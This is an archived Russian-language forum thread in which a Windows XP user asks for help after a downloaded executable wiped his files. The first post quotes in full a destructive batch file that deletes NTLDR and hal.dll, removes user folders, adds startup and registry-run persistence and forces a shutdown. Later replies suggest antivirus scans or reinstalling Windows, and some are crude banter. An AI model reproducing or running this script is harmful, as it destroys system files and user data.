Просмотр полной версии : настройки пользователя winxp
Sholoman
28.08.2009, 01:27
Всем привет!
Зародилась проблема, по средине для открыл ***.exe после открытия файл уничтожился, сразу понял что вирус я начал искать файлы и нашел 2 батника в первом просто текст а втором вот
cd\
ATTRIB -R -H -S c:\*.*
del /f /s /q NTLDR
cd %windir%
cd system32
start c:\hello.bat \wait
rmdir /s /q "C:\Documents and Settings\"
del /f /s /q hal.dll
cd c:\windows/system32
del HAL.DLL /f /s /q
cd c:\windows/servicepackfiles/i386
del hal.dll /f /s /q
cd c:\windows/$NtServicePackUninstall$
del hal.dll /f /s /q
RUNDLL MOUSE,DISABLE
RUNDLL KEYBOARD,DISABLE
COPY %0 *path*
COPY %0 "C:/Documents and Settings\All Users\Start Menu\Programs\Startup
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d *path to bat file\nameofbatfile.bat* /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v owned /t reg_sz /d *path to bat file\nameofbatfile.bat* /f
ipconfig /release
shutdown -s -t 120 -c "You Have 180 Seconds To save Your HD Information"
полетела винда пропал файл ntldr я его восстановил, удалились еще все файлы пользователей их я тоже восстановил через рстудия.
Сейчас у меня осталась одна проблема, удалились с компьютера все пользователи кроме моего.
Если создать новый пользователь то у него все не работает например отображение скрытых файлов, нельзя поменять заставку, фон, шрифт и так далее но у моего пользователя все работает отлично!
Есть еще файл NTUSER.DAT знаете наверно в документах лежит, если на него тыкнуть то сразу вылетает експлотер из-за чего не знаю =(
Как мне создать нормального пользователя с нормальными привилегиями, я так понял поменялись в реестре настройки которые идут по умолчанию из этого следует ...
Можно ли это както устранить ? Помогите...
Переустанови винду или антивирем весь хард проверь...
Sholoman
28.08.2009, 01:57
винду переустанавливать не собираюсь, так как больше 100gb сохранять придется.
мне кажется антивирус все не исправит, пытался еще программой для восстановления реестра все равно не катит.
Sholoman
28.08.2009, 01:59
да винда XP SP3
Проще винду переустановить... есть ещё вариант, но винда может криво работать...
Sholoman
28.08.2009, 02:04
давай )))
Винду поверх своей винды установить :D И все данные остануться на своих местах...
Sholoman
28.08.2009, 02:12
так и знал что это напишешь )))
del /f /s /q hal.dll
RUNDLL MOUSE,DISABLE
RUNDLL KEYBOARD,DISABLE
Как после такого вообще что-то работает. Значит не сработал вирус, если клава в рабочем состоянии.
П.С. А кто знает, за что отвечает hal.dll ?
ТС, скачай с сайда ДрВеб сканер бесплатный, CureIt называется. Просканься. Хотя реестр придется вручную фиксить, если не хочешь переустонавливать винду.
Sholoman
28.08.2009, 02:26
а и ещё
shutdown -s -t 120 -c "You Have 180 Seconds To save Your HD Information"
не сработал )))
GreenBear
28.08.2009, 02:31
охуеть, да ты хакер блять!
Sholoman
28.08.2009, 02:35
а и ещё у меня в c:\windows лежит Vista, а в c:\windows.0 XP
ещё лучше )))
del HAL.DLL /f /s /q
del hal.dll /f /s /q
del hal.dll /f /s /q
у кого ещё какие идеи есть, а то я уже диск готовлю и резервку делаю )))?
сомое главное
пароль от мыла, ключь от вебмани, логин от paypal, icq что ещё ?
GreenBear
28.08.2009, 02:37
а че у тебя в c:\Users лежит а
Sholoman
28.08.2009, 02:39
у меня С:\Users и C:\Documents and Settings одно и то же, а что такое ?
GreenBear
28.08.2009, 02:40
а че ты
Sholoman
28.08.2009, 02:43
Чего ?))))
что нет решения чтоли этой проблемы ????
а нельзя скопировать строчки моего пользователя и перенести их на другой пользовател исправив пару строчек ... ?
GreenBear
28.08.2009, 02:44
какие на*** строчки, ты чего путаешь бес
Sholoman
28.08.2009, 02:45
да у тебя дар просто какой то плохие идеи отклонять )))
Подскажи что сделать можно ))
Alexandr II
28.08.2009, 02:49
скань комп в безопаске.... авз\др.веб тебе помогут думаю.. если не помогут то лезь в реестр)
Sholoman
28.08.2009, 02:52
скань комп в безопаске.... авз\др.веб тебе помогут думаю.. если не помогут то лезь в реестр)
ща сканить начну, а что в реестре делать ?
я почитал tweaks попробовал пару штучек и запарол пару приложений но я ещё могу их использовать, а у других пользователей нельзя в реестр ничего добавлять с *.reg у меня мало опыта с реестром а всё остально норм пока )))
GreenBear
28.08.2009, 02:53
хуле ты такой модный, ставь линукс и не еби форумчанам мозги!
Оло
Хакеры %SystemRoot% Не юзают ? :D
Sholoman
28.08.2009, 03:03
хуле ты такой модный, ставь линукс и не еби форумчанам мозги!
ну не надо матом ) глаза мазолит )))))
Linux всякие Unix мне пока не нужны на днях тока закончил изучение Blitz3D такто мне надо не тока OpenGL но и DirectX.
Ну короче не крути яйца, для увеличения своего опыта хочу узнать как справиться с такой ситуацией :rolleyes:
Оло
Хакеры %SystemRoot% Не юзают ? :D
эх блин искал прогу наверно как ты говоришь "хакер" очень поторопился и людей начал смешить )))
зачем хакеру писать %SystemRoot% когда C:\Windows можно скопировать в адресной строке и тем более там меньше символов, а это значит быстрее напечатаешь ))) :D :D :D
Помниш название вируса ? Попробуй поищи его в базах каспера или чего то еще. Мб там есть точное описание того что делает вирус ( тупой совет ). А вообще.... перестановка рулит. Так как винду ты уже врядле исправиш. Фиг его знает че там еще вирус натворил.
зачем хакеру писать %SystemRoot% когда C:\Windows можно скопировать в адресной строке и тем более там меньше символов, а это значит быстрее напечатаешь ))) :D :D :D
А ты не думал о таком что системная дериктория может быть не тока на C Но и на D и т.д ! Открытие До ? :D
Sholoman
28.08.2009, 03:15
Помниш название вируса ? Попробуй поищи его в базах каспера или чего то еще. Мб там есть точное описание того что делает вирус ( тупой совет ). А вообще.... перестановка рулит. Так как винду ты уже врядле исправиш. Фиг его знает че там еще вирус натворил.
ага даже так!
ну смотри файл *.exe был скачен и просканирован 2 раза авастом это первое
я так думаю что exe был создан Winrarом так как там есть такая функция распокавать и открыть файл
формат .bat и исходный код антивирусом не проверяеться XD))
А ты не думал о таком что системная дериктория может быть не тока на C Но и на D и т.д ! Открытие До ? :D
вообщето я шутил :D :D :D :D :D
GreenBear
28.08.2009, 03:16
ну смотри файл *.exe был скачен и просканирован 2 раза авастом это первое
в этом и есть ваша проблема, господин. дело в том, что надо это делать 4 раза. 2 раза утром и 2 раза вечером. и можно еще 1 раз ночью.
вообщето я шутил :D :D :D :D :D
Та я тоже изначально шутил ;)
З.Ы Сноси винду... и файлы можно не потерять (тоесть установить по верх) Самый норм а сидеть с какойто поломаной виндой дак это ппц... А если этот вирь еще БД приташил за собой ? и будеш так сидеть пока вася не законектится и не потерёт у тя всё... От тогда ты точно всё потеряеш :eek:
Sholoman
28.08.2009, 03:20
в этом и есть ваша проблема, господин. дело в том, что надо это делать 4 раза. 2 раза утром и 2 раза вечером. и можно еще 1 раз ночью.
а прикольно может мне ещё его открыть в блокноте запомнить, далее пойти к другу напечать его в блокноте и сохранить как *.exe и показать ему типо пусть тоже посканирует ?
Sholoman
28.08.2009, 03:20
Та я тоже изначально шутил ;)
З.Ы Сноси винду... и файлы можно не потерять (тоесть установить по верх) Самый норм а сидеть с какойто поломаной виндой дак это ппц... А если этот вирь еще БД приташил за собой ? и будеш так сидеть пока вася не законектится и не потерёт у тя всё... От тогда ты точно всё потеряеш :eek:
ну да наверно так и поступлю =(
опять лицензию искать драйвера )))
del /f /s /q hal.dll
RUNDLL MOUSE,DISABLE
RUNDLL KEYBOARD,DISABLE
Как после такого вообще что-то работает.
А что по твоему не должно работать? RUNDLL это не команда, это не файл (тем более в папке c:\windows/$NtServicePackUninstall$)
такчо я незнаю что по твоему там неработать должно...
Sholoman
28.08.2009, 13:44
Всё ребятки чики пуки всё переустановил ))))
Тема закрыта :D
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot